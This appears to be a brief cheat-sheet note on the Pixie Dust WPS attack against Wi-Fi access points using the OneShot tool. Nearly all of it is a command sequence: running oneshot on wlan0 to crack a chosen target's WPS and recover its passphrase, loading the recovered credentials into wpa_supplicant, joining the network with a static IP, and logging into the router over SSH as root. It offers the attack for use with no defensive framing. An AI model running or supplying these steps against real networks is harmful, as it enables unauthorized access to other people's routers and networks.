Pixie Dust
Pixie Dust
OneShot, perform WiFi attacks even if the WiFi interface is not on monitor mode
Github repo: https://github.com/nikita-yfh/OneShot-C
Usage:
Pixie Dust Attack
./oneshot -i wlan0 -K (Scan for the BSSID of the interface, then type a number to choose your target)
wpa_passphrase AP_SSID 'WPA_PSK_PASSWORD' > psk (Put all necessary credentials in one file)
wpa_supplicant -B -c psk -i wlan0
ifconfig wlan0 192.168.1.5 netmask 255.255.255.0 (Assign IP to interface. You may assign any IP you want to the specific interface)
ssh root@192.168.1.1 Last updated